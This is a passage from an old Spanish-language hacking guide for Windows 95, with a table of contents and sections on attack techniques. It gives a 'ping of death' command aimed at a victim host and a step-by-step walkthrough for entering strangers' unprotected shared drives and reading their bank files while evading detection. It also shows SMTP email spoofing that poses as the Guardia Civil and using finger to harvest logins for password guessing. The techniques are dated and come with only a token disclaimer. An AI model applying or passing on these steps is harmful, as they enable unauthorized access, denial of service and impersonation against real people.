|
| |
1 ......................... Que Es Esta Guia
Exactamente ?
2 ......................... Descripcion General
De Windows.
2a ....................... Seguridad En Windows.
3 ......................... Protocolo TCP/IP y Demas Historias.
3a ....................... Puertos.
3b ....................... Ftp.
3c ....................... Telnet.
4 ......................... Hacking Basico En Windows.
4a ....................... Phf.
4b ....................... Ftp.
4c ....................... Ping De La Muerte.
4d ....................... Recursos Compartidos.
4e ....................... Fake Mail Con El Telnet.
4f ....................... Cambiando El Entorno.
4g ....................... Finger.
4h ....................... Whois.
4i ....................... Tracert.
5 ......................... Utilizacion De Tools.
5a ....................... SkamWerks Lab version 1.1b.
5b ....................... WaReZ! Version 95.12.31.
5c ....................... John the Ripper v1.4.
5d ....................... Gobbler v 2.1.
5e ....................... Modificando el WS_FTP.
5f ....................... Sharepasswd.
5g ....................... Snadboy's Revelation v1.1.
5h ....................... Keylog95.
5i ....................... Glide.
5j ....................... Win95 AnonyMail v 1.0.
5k ....................... Hacker's Utility, V 1.02.
5l ....................... Haktek v1.1.
5m ....................... Claymore Brute Force.
6 ......................... Medidas De Seguridad.
6a ....................... Protegiendo Nuestro Ordenador.
6a1 ..................... Ataques Tipicos a Nuestro Windows.
6a2 ..................... Encriptacion De Nuestra Informacion.
6a3 ..................... Eliminar Informacion De Forma Segura.
6a4 ..................... Eliminacion De Virus.
6b ....................... Protegiendo Nuestras Acciones.
6b1 ..................... Borrando Nuestras Huellas.
6b2 ..................... Encriptando Nuestro Correo.
7 ......................... Sugerencias Para Un Mejor Hacking.
8 ......................... Obtener Informacion.
9 ......................... Despedida.
9a ....................... Agradecimientos.
4c. Ping De La Muerte.
Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un
servidor o sea que se desconecta de Internet y esto puede representar
grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
aqui os lo explicare no es cuestion que lo useis por Internet atacando
servidores.
La utilidad Ping sirve principalmente para saber si un servidor esta activo
y ademas podemos calcular el trafico en la red segun el tiempo de su
respuesta. Basicamente se le envia un paquete a un servidor y este nos
contesta, solo que si se le envia un paquete muy grande puede llegar
desordenado, por lo que el servidor pide al origen que le vuelva a enviar
una parte o la totalidad del paquete, por lo que se produce un datagrama
del ping muy grande y producira su caida. Para ejecutar este ataque solo
tenemos que escribir :
c:\>ping -l 65510 victima.com
Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes
de hacer tonterias leed la parte sobre seguridad de la guia.
4d. Recursos Compartidos.
Como win95 NO tiene seguridad nos permite colarnos en el disco duro de
otra persona por Internet y lo mejor del caso es que esta tecnica nos la
proporciona los propios programas del win95. Por supuesto no todo es tan
sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
configuracion del propio usuario al no configurar adecuadamente los
recursos compartidos de su red corriendo sobre win95.
Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador
bien configurado, o sea el compartir recursos bien puesto y tambien tener
el Netbios instalado. Para configurarlo, tenemos que tener activado la
opcion de "compartir ficheros e impresoras" en MIPC->Panel de
Control->Red.
SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
"a¤adir" y a¤adimos el servicio "Compartir ficheros e
impresoras en redes
Microsoft". En la misma ventana, debemos tener el "Primer inicio de
sesion"
en "Cliente para redes Microsoft". Tambien tiene que estar activado el
"Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->
propiedades, debiendo estar activada la casilla "conectarse a la red".
Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
ventana del MS-DOS y ejecutamos:
c:\>nbtstat -A (IP DE LA VICTIMA)
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
VICTIMAMACHINE <00> UNIQUE Registered
VICTIMAGROUP <00> GROUP Registered
VICTIMAMACHINE <03> UNIQUE Registered
VICTIMAMACHINE <20> UNIQUE Registered
VICTIMAGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Cuando ejecutamos este comando nos saldra una tabla como esta y el
primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
ver la maquina se llama VICTIMAMACHINE.
Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso
encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP
y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
c:\>edit c:\windows\system32\LMHOSTS
VICTIMAMACHINE
Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
un comando para a¤adir el ordenador de la victima a nuestro Netbios y
esto seria de la siguiente forma:
c:\>NBTSTAT -R
Ahora nos interesa saber que recursos comparte la victima y esto tampoco
nos traera complicacion alguna:
c:\>net view \\VICTIMAMACHINE
Shared resources at \\VICTIMAMACHINE
Sharename Type Comment
-----------------------------------------
BANCO Disk
Y como podemos observar comparte una carpeta llamada BANCO.
Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
sobre win95. Ya solo nos queda ejecutar el comando que querramos, si por
ejemplo queremos ver el contenido, solo tenemos que escribir:
c:\> dir \\VICTIMAMACHINE\BANCO
O para leer cualquier fichero de la carpeta:
c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
Si queremos conectar al recurso compartido de forma grafica (o sea con
una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
si hemos a¤adido la VICTIMAMACHINE a una unidad de red a la que podamos
llamar, deberemos ejecutar:
c:\>NET USE e: \\MIPC\WINDOWS
Esta tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11 y
ademas comparte las carpetas sin contrase¤a en modo "Acceso a nivel
compartido" MIPC->Panel de control->Red | Control de acceso. Si
utilizase
el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
para que este autorizada, esto lo conseguiremos con el Regedit, por
desgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web
Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
informar de la conveniencia de hacerlo al usuario, ya que el servidor web
obliga a compartir carpetas aun sin tener red local.
Logicamente un usuario que haya tenido el despiste de conectarse a Internet
con carpetas compartidas no toma luego medidas de control sobre quien
entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser
pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
muestra los usuarios conectados a nuestra computadora en cada momento y por
supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
el Regedit a un nombre menos sospechoso.
Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
dara cuenta de nuestra entrada. Tambien hay que decir que si la
VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
"hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
si ocurre esto seremos pillados.
4e. Fake Mail Con El Telnet.
Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
querramos :). La verdad es que tiene pocos usos, en mi opinion debido a
una serie de razones pero siempre puede servir para gastar una buena
broma enviando aun amigo un mail del director de la Universidad diciendo
que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
Guardia Civil.
La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
unas ciertas medidas de seguridad, que ya explicare luego. Lo primero
que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del
Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de
poner
el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
a que nos conectemos a ese puerto, cuando conectemos nos saldra un
mensaje y esta esperando a que pulsemoa alguna tecla:
220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
Muchas veces lo que podemos hacer es escribir "help" y saldran todos
los
comandos, tambien podemos escribir "echo" y la maquina nos contestara
que
esta lista. Para escribir un mail hay que seguir una serie de pasos:
mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.
El servidor nos contesta:
250 <gc.uco@mad.servicom.es> ... Sender Okay
Ahora escribimos:
rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.
El servidor nos contesta:
250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay
Ahora escribimos:
data
El servidor nos contesta:
354 Enter mail, end with "." on a line by itself
Ahora escribimos:
To: nob_ody@xxxxxxxx.com
From: gc.uco@mad.servicom.es
Subject: Te querremos!!
Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
querremos fichar para el departamento.
Direccion General de
la Guardia Civil
. <- para terminar el mail.
El servidor nos contesta:
250 Mail accepted
Ahora escribimos:
quit <- ya esta todo listo :)
Pues ves como es realmente simple!! Pero antes de empezar a jugar con
esta tecnica tenemos que asegurarnos que el servidor de mail no regrista
nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
sobre servidores que permiten hacer esto.
4f. Cambiando El Entorno.
Esta tecnica no es que sea propia del hacking ya que solo sirve para
cambiar la pantalla de inicio o la de finalizar windows. Los logos de
windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros
con extension SYS pero siguen siendo realmente BMP'S.
El logo del principio de windows (ya sabes el de las nubes) lo podeis
encontrar como:
c:\>logo.sys
Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo
y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro
grafico y si lo volvemos a quitar, usara el de siempre. El logo del final
(cuando cierra windows) esta en el directorio windows y lo podemos
encontrar como:
c:\windows>logos.sys
Logicamente es obligatorio que los graficos que querramos sustituir
tengan de tama¤o 320x400 y sean ficheros BMP'S. Conviene que les pongamos
el atributo de ocultos, que esto se hace con el comando Attrib, por
ejemplo:
c:\windows>attrib +h logos.sys <- lo oculta.
c:\windows>attrib -h logos.sys <- lo hace visible.
4g. Finger.
La utilidad Finger, muy usada en Unix, en realidad no esta disponible en
Win95 pero como somos Hackers nosotros si que somos capaces desde Win95.
Finger se utiliza para obtener informacion de un servidor. Puede parecer
una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's
de los usuarios y empezar a adivinar sus passwords, tambien podemos
vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
ultima vez que estuvo, etc...) y asi muchas cosas.
La verdad es que para usar el Finger usaremos cualquier navegador, IE o
Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
que permite hacer Finger a cualquier host y nos deveulve los resultados.
Esto se conoce como "Finger Gateway". El url del web es:
http://www.hgp.med.umich.edu/cgi-bin/finger
4h. Whois.
La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
disponible en Win95 pero comos somos asi de listos saldremos del apuro.
Tambien sirve para pedir informacion de un servidor pero no el igual que
Finger, ya que se diferencian en el tipo de informacion, el finger se suele
utilizar mucho para buscar direcciones de correo mientras que el Whois,
para averiguar informacion sobre un servidor en concreto.
Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
host muy especial:
c:\>telnet whois.internic.net
Por supuesto Internic, una empresa privada norte ameriacana que se
encarga de controlar los dominios de Internet, y podemos usar su base
de datos para pedir informacion sobre un servidor.
Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
del_servidor" y nos sacara la informacion.
telnet InterNIC > whois aol.com
Connecting to the rs Database . . . . . .
Connected to the rs Database
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL.COM
Administrative Contact:
O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
703/453-4255 (FAX) 703/453-4102
Technical Contact, Zone Contact:
America Online (AOL-NOC) trouble@aol.net
703-453-5862
Billing Contact:
Barrett, Joe (JB4302) BarrettJG@AOL.COM
703-453-4160 (FAX) 703-453-4001
Record last updated on 13-Mar-97.
Record created on 22-Jun-95.
Domain servers in listed order:
DNS-01.AOL.COM 152.163.199.42
DNS-02.AOL.COM 152.163.199.56
DNS-AOL.ANS.NET 198.83.210.28
Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto
es lo que nos ha sacado Internic. Al final podemos ver los dominios
asociados a AOL. Pues sencillo y muy util, el whois.
Quiero seguir leyendo
|